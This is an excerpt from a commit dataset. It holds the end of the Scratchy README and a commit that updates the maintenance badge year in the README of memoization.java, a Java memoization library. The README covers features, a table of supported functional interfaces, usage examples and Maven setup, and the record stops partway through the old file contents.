\n\n==== Pre-existing files ====\n\nScratchy will not overwrite your existing docs, nor will it append to them or try to merge\nthem. You will need to move your old docs out of the way. Scratchy will not abort, but\nwill communicate that it failed to write that path.\n\n== Running Scratchy ==\n\nScratchy has only one required argument +--output+, to tell scratchy where to put the docs it\nextracts. For example:\n\n scratchy -o docs\n\nWould put the extracted docs into +.\/docs+. Here is the command we used to build the docs you are\nreading right now:\n\n scratchy -uo docs -p scratchy\n\nScratchy is extracting documentation from itself! Spooky.\nIf you're wondering what those switches\ndo, see the link:..\/usage.html[Command Line reference]\n\n\n== Post-Processing ==\n\nScratchy is designed to promote post processing. Why? Because how can anyone know what format\nyou will want your documentation in, or for what purpose? Scratchy does not assume you're\nwriting API docs, nor does it assume that a web browser will be the destination for the\ndocumentation it extracts. How you choose to post process is up to you.\n\n==== How does scratchy do it? ====\n\nBecause the documentation for the Scratchy project is in ASCIIDoc, we have\nthe option of extracting it to HTML, PDF, ePub, and a host of other formats. Here is the command\nwe use to post process Scratchy's output:\n\n find docs -type file | xargs -L 1 asciidoc -a numbered -b html5 -a icons -a toc2\n\n\nNOTE: For more information, as well as usage and commandline switches, see the docs\/ directory.","old_contents":"scratchy\n========\n\nA wildly simple nodejs utility for storing user docs in code. \n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c6441c4f1a68655f298ebbb7c33fb2a2d9ebe9ed","subject":"Update maintenance badge","message":"Update maintenance badge\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>\n","repos":"sebhoss\/memoization.java","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= memoization.java image:https:\/\/img.shields.io\/badge\/email-%40metio-brightgreen.svg?style=social&label=mail[\"Discuss on Google Groups\", link=\"https:\/\/groups.google.com\/forum\/#!forum\/metio\"] image:https:\/\/img.shields.io\/badge\/irc-%23metio.wtf-brightgreen.svg?style=social&label=IRC[\"Chat on IRC\", link=\"http:\/\/webchat.freenode.net\/?channels=metio.wtf\"]\nSebastian Ho\u00df <http:\/\/seb.xn--ho-hia.de\/[@sebhoss]>\n:github-org: sebhoss\n:project-name: memoization.java\n:project-group: de.xn--ho-hia.memoization\n:coverity-project: 8732\n:codacy-project: 0ed810b7f2514f0ea1c8e86e97c803c4\n:jdk-api: https:\/\/docs.oracle.com\/javase\/8\/docs\/api\n:issue: https:\/\/github.com\/sebhoss\/memoization.java\/issues\n:toc:\n:toc-placement: preamble\n\nimage:https:\/\/img.shields.io\/badge\/license-cc%20zero-000000.svg?style=flat-square[\"CC Zero\", link=\"http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/\"]\npass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/maven-badges.herokuapp.com\/maven-central\/de.xn--ho-hia.memoization\/memoization.java\"><img src=\"https:\/\/img.shields.io\/maven-central\/v\/de.xn--ho-hia.memoization\/memoization.java.svg?style=flat-square\" alt=\"Maven Central\"><\/a><\/span>]\nimage:https:\/\/reposs.herokuapp.com\/?path={github-org}\/{project-name}&style=flat-square[\"Repository size\"]\nimage:https:\/\/www.openhub.net\/p\/memoization-java\/widgets\/project_thin_badge?format=gif[\"Open Hub statistics\", link=\"https:\/\/www.openhub.net\/p\/memoization-java\"]\n\nimage:https:\/\/img.shields.io\/travis\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Build Status\", link=\"https:\/\/travis-ci.org\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coveralls\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Code Coverage\", 
link=\"https:\/\/coveralls.io\/github\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coverity\/scan\/{coverity-project}.svg?style=flat-square[\"Coverity Scan Result\", link=\"https:\/\/scan.coverity.com\/projects\/{github-org}-memoization-java\"]\nimage:https:\/\/img.shields.io\/codacy\/grade\/{codacy-project}.svg?style=flat-square[\"Codacy Code Quality\", link=\"https:\/\/www.codacy.com\/app\/mail_7\/memoization-java\"]\nimage:https:\/\/img.shields.io\/badge\/forkable-yes-brightgreen.svg?style=flat-square[\"Can this project be forked?\", link=\"https:\/\/basicallydan.github.io\/forkability\/?u={github-org}&r={project-name}\"]\nimage:https:\/\/img.shields.io\/maintenance\/yes\/2017.svg?style=flat-square[\"Is this thing still maintained?\"]\nimage:https:\/\/img.shields.io\/bountysource\/team\/metio\/activity.svg?style=flat-square[\"Bounties on open tickets\", link=\"https:\/\/www.bountysource.com\/teams\/metio\"]\n\n_Java link:https:\/\/en.wikipedia.org\/wiki\/Memoization[memoization] library - trade space for time_\n\n== Features\n\n* Memoize calls to `Consumer`, `Function`, `Predicate`, `Supplier` and other functional interfaces in `java.util.function`\n* Cache values using link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine], link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava], link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] or any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`]\n* Customize cache key calculation\n\n.Coverage of `java.util.function`\n|===\n| | Caffeine | Guava | JCache | ConcurrentMap\n\n| link:{jdk-api}\/java\/util\/function\/BiConsumer.html[BiConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiFunction.html[BiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiPredicate.html[BiPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BooleanSupplier.html[BooleanSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Consumer.html[Consumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleBinaryOperator.html[DoubleBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleConsumer.html[DoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleFunction.html[DoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoublePredicate.html[DoublePredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleSupplier.html[DoubleSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToIntFunction.html[DoubleToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToLongFunction.html[DoubleToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleUnaryOperator.html[DoubleUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Function.html[Function]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntBinaryOperator.html[IntBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntConsumer.html[IntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| 
link:{jdk-api}\/java\/util\/function\/IntFunction.html[IntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntPredicate.html[IntPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntSupplier.html[IntSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToDoubleFunction.html[IntToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToLongFunction.html[IntToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntUnaryOperator.html[IntUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongBinaryOperator.html[LongBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongConsumer.html[LongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongFunction.html[LongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongPredicate.html[LongPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongSupplier.html[LongSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToDoubleFunction.html[LongToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToIntFunction.html[LongToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongUnaryOperator.html[LongUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjDoubleConsumer.html[ObjDoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjIntConsumer.html[ObjIntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjLongConsumer.html[ObjLongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Predicate.html[Predicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Supplier.html[Supplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleBiFunction.html[ToDoubleBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleFunction.html[ToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntBiFunction.html[ToIntBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntFunction.html[ToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongBiFunction.html[ToLongBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongFunction.html[ToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n|===\n\n\n== Development Status\n\nThe Caffeine, Guava, JCache and `ConcurrentMap` based implementations cover all functional interfaces from `java.util.function`. 
Take a look at the link:https:\/\/github.com\/sebhoss\/memoization.java\/issues[open tickets] for future ideas & ways to help out.\n\n== Usage\n\nMemoize any of the supported types by using the static factory methods supplied by:\n\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-caffeine\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-caffeine.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `CaffeineMemoize` if you want to use link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-guava\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-guava.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `GuavaMemoize` if you want to use link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-jcache\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-jcache.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `JCacheMemoize` if you want to use link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] (JSR107) caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-core\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-core.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `MapMemoize` if you want to use any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`] as cache.\n\n=== Default cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier);\n----\n\n=== Default cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier);\n----\n\n=== Custom cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nCache<INPUT, INPUT> cache = ...; \/\/ 
com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nCache<INPUT, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nCache<INPUT, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nMap<String, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, cache);\n----\n\n=== Custom cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nMap<KEY, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier, cache);\n----\n\nNote that `MapMemoize` accepts any `Map`, but copies the entries in the map to a new `ConcurrentHashMap` in case the provided `Map` is not also a `ConcurrentMap`. This is done in order to ensure atomic `computeIfAbsent` behavior.
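\n\nAs a usage sketch (the `expensiveSquare` function is hypothetical, and the factory method follows the pattern shown in the examples above):\n\n[source, java]\n----\nimport java.util.concurrent.ConcurrentHashMap;\nimport java.util.concurrent.ConcurrentMap;\nimport java.util.function.Function;\n\nConcurrentMap<Integer, Integer> cache = new ConcurrentHashMap<>();\nFunction<Integer, Integer> expensiveSquare = x -> x * x; \/\/ stands in for an expensive computation\nFunction<Integer, Integer> memoized = MapMemoize.function(expensiveSquare, cache);\n\nmemoized.apply(3); \/\/ computes and stores 9 under key 3\nmemoized.apply(3); \/\/ answered from the ConcurrentMap, no recomputation\n----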
This is done in order to ensure atomic `computeIfAbsent` behavior.\n\n=== Integration\n\nIn order to use this project, declare the following inside your POM:\n\n[source, xml, subs=\"attributes,verbatim\"]\n----\n<dependencies>\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-core<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n\n <!-- CAFFEINE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-caffeine<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.github.ben-manes.caffeine<\/groupId>\n <artifactId>caffeine<\/artifactId>\n <version>${version.caffeine}<\/version>\n <\/dependency>\n <!-- CAFFEINE ONLY -->\n\n <!-- GUAVA ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-guava<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.google.guava<\/groupId>\n <artifactId>guava<\/artifactId>\n <version>${version.guava}<\/version>\n <\/dependency>\n <!-- GUAVA ONLY -->\n\n <!-- JCACHE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-jcache<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>javax.cache<\/groupId>\n <artifactId>cache-api<\/artifactId>\n <version>${version.jcache}<\/version>\n <\/dependency>\n <!-- Add your JCache implementation here -->\n <dependency>\n <groupId>...<\/groupId>\n <artifactId>...<\/artifactId>\n <version>...<\/version>\n <\/dependency>\n <!-- JCACHE ONLY -->\n\n<\/dependencies>\n----\n\nReplace `${version.memoization}` with the pass:[<a href=\"https:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3Ade.xn--ho-hia.memoization\">latest release<\/a>]. This project follows the link:http:\/\/semver.org\/[semantic versioning guidelines].\nPopular JCache implementations are link:http:\/\/www.ehcache.org\/[Ehcache], link:http:\/\/commons.apache.org\/proper\/commons-jcs\/[Commons JCS], link:https:\/\/hazelcast.org\/[Hazelcast], link:http:\/\/infinispan.org\/[Infinispan], link:https:\/\/ignite.apache.org\/[Apache Ignite] and link:http:\/\/www.alachisoft.com\/tayzgrid\/[TayzGrid].\nUse link:https:\/\/github.com\/jhalterman\/expiringmap[ExpiringMap], link:https:\/\/github.com\/ben-manes\/concurrentlinkedhashmap[ConcurrentLinkedHashMap], link:https:\/\/github.com\/OpenHFT\/Chronicle-Map[Chronicle-Map], link:http:\/\/www.cacheonix.org\/[Cacheonix] or other `ConcurrentMap` implementations as alternatives to the default `ConcurrentHashMap` used in the `MapMemoize` factory. 
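For example, an expiring map can stand in for the plain `Map` used above (a minimal sketch, assuming ExpiringMap's builder API and a `MapMemoize.function(function, cache)` overload analogous to the documented `supplier` variants):\n\n[source, java]\n----\n\/\/ hypothetical sketch: memoize in an expiring ConcurrentMap\n\/\/ net.jodah.expiringmap.ExpiringMap implements ConcurrentMap\nFunction<INPUT, OUTPUT> function = ...;\nMap<INPUT, OUTPUT> cache = ExpiringMap.builder()\n .expiration(5, TimeUnit.MINUTES)\n .build();\nFunction<INPUT, OUTPUT> memoizedFunction = MapMemoize.function(function, cache);\n----\n\n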
Caches like link:http:\/\/cache2k.org\/[cache2k] can be used together with both `JCacheMemoize` as a JSR-107 cache and `MapMemoize` by calling `cache.asMap()`.\n\n=== Compatibility\n\nThis project is compatible with the following Java versions:\n\n.Java compatibility\n|===\n| | 1.X.Y | 2.X.Y\n\n| Java 8\n| \u2713\n| \u2713\n|===\n\n== Alternatives\n\n* link:http:\/\/www.tek271.com\/software\/java\/memoizer[Tek271 Memoizer]\n* link:https:\/\/github.com\/kelvinguu\/gitmemoizer[GitMemoizer]\n* link:http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/cache.html#cache-annotations-cacheable[Spring's `@Cacheable`]\n* link:https:\/\/github.com\/marmelo\/chili#memoize[Chili's `@Memoize`]\n* link:https:\/\/clojuredocs.org\/clojure.core\/memoize[Clojure's `(memoize f)`]\n* link:http:\/\/docs.groovy-lang.org\/latest\/html\/gapi\/groovy\/transform\/Memoized.html[Groovy's `@Memoized`]\n* link:https:\/\/github.com\/cb372\/scalacache#memoization-of-method-results[ScalaCache's `memoize`]\n* link:https:\/\/github.com\/aol\/cyclops\/tree\/master\/cyclops-javaslang#memoization-with-a-guava-cache[Cyclops' `Memoize`]\n* link:https:\/\/github.com\/pakoito\/RxMemoization[RxMemoization]\n* link:https:\/\/github.com\/jmorwick\/memoized[memoized]\n* link:https:\/\/github.com\/ggrandes\/memoizer[memoizer]\n* link:http:\/\/aspects.jcabi.com\/annotation-cacheable.html[jcabi's `@Cacheable`]\n\n== License\n\nTo the extent possible under law, the author(s) have dedicated all copyright\nand related and neighboring rights to this software to the public domain\nworldwide. This software is distributed without any warranty.\n\nYou should have received a copy of the CC0 Public Domain Dedication along\nwith this software. If not, see http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/.\n\n== Mirrors\n\n* https:\/\/github.com\/sebhoss\/memoization.java\n* https:\/\/bitbucket.org\/sebhoss\/memoization.java\n* https:\/\/gitlab.com\/sebastian.hoss\/memoization.java\n* http:\/\/v2.pikacode.com\/sebhoss\/memoization.java\n* http:\/\/repo.or.cz\/memoization.java.git\n","old_contents":"= memoization.java image:https:\/\/img.shields.io\/badge\/email-%40metio-brightgreen.svg?style=social&label=mail[\"Discuss on Google Groups\", link=\"https:\/\/groups.google.com\/forum\/#!forum\/metio\"] image:https:\/\/img.shields.io\/badge\/irc-%23metio.wtf-brightgreen.svg?style=social&label=IRC[\"Chat on IRC\", link=\"http:\/\/webchat.freenode.net\/?channels=metio.wtf\"]\nSebastian Ho\u00df <http:\/\/seb.xn--ho-hia.de\/[@sebhoss]>\n:github-org: sebhoss\n:project-name: memoization.java\n:project-group: de.xn--ho-hia.memoization\n:coverity-project: 8732\n:codacy-project: 0ed810b7f2514f0ea1c8e86e97c803c4\n:jdk-api: https:\/\/docs.oracle.com\/javase\/8\/docs\/api\n:issue: https:\/\/github.com\/sebhoss\/memoization.java\/issues\n:toc:\n:toc-placement: preamble\n\nimage:https:\/\/img.shields.io\/badge\/license-cc%20zero-000000.svg?style=flat-square[\"CC Zero\", link=\"http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/\"]\npass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/maven-badges.herokuapp.com\/maven-central\/de.xn--ho-hia.memoization\/memoization.java\"><img src=\"https:\/\/img.shields.io\/maven-central\/v\/de.xn--ho-hia.memoization\/memoization.java.svg?style=flat-square\" alt=\"Maven Central\"><\/a><\/span>]\nimage:https:\/\/reposs.herokuapp.com\/?path={github-org}\/{project-name}&style=flat-square[\"Repository 
size\"]\nimage:https:\/\/www.openhub.net\/p\/memoization-java\/widgets\/project_thin_badge?format=gif[\"Open Hub statistics\", link=\"https:\/\/www.openhub.net\/p\/memoization-java\"]\n\nimage:https:\/\/img.shields.io\/travis\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Build Status\", link=\"https:\/\/travis-ci.org\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coveralls\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Code Coverage\", link=\"https:\/\/coveralls.io\/github\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coverity\/scan\/{coverity-project}.svg?style=flat-square[\"Coverity Scan Result\", link=\"https:\/\/scan.coverity.com\/projects\/{github-org}-memoization-java\"]\nimage:https:\/\/img.shields.io\/codacy\/grade\/{codacy-project}.svg?style=flat-square[\"Codacy Code Quality\", link=\"https:\/\/www.codacy.com\/app\/mail_7\/memoization-java\"]\nimage:https:\/\/img.shields.io\/badge\/forkable-yes-brightgreen.svg?style=flat-square[\"Can this project be forked?\", link=\"https:\/\/basicallydan.github.io\/forkability\/?u={github-org}&r={project-name}\"]\nimage:https:\/\/img.shields.io\/maintenance\/yes\/2016.svg?style=flat-square[\"Is this thing still maintained?\"]\nimage:https:\/\/img.shields.io\/bountysource\/team\/metio\/activity.svg?style=flat-square[\"Bounties on open tickets\", link=\"https:\/\/www.bountysource.com\/teams\/metio\"]\n\n_Java link:https:\/\/en.wikipedia.org\/wiki\/Memoization[memoization] library - trade space for time_\n\n== Features\n\n* Memoize calls to `Consumer`, `Function`, `Predicate`, `Supplier` and other functional interfaces in `java.util.function`\n* Cache values using link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine], link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava], link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] or any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`]\n* Customize cache key calculation\n\n.Coverage of `java.util.function`\n|===\n| | Caffeine | Guava | JCache | ConcurrentMap\n\n| link:{jdk-api}\/java\/util\/function\/BiConsumer.html[BiConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiFunction.html[BiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiPredicate.html[BiPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BooleanSupplier.html[BooleanSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Consumer.html[Consumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleBinaryOperator.html[DoubleBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleConsumer.html[DoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleFunction.html[DoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoublePredicate.html[DoublePredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleSupplier.html[DoubleSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToIntFunction.html[DoubleToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToLongFunction.html[DoubleToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| 
link:{jdk-api}\/java\/util\/function\/DoubleUnaryOperator.html[DoubleUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Function.html[Function]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntBinaryOperator.html[IntBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntConsumer.html[IntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntFunction.html[IntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntPredicate.html[IntPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntSupplier.html[IntSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToDoubleFunction.html[IntToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToLongFunction.html[IntToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntUnaryOperator.html[IntUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| 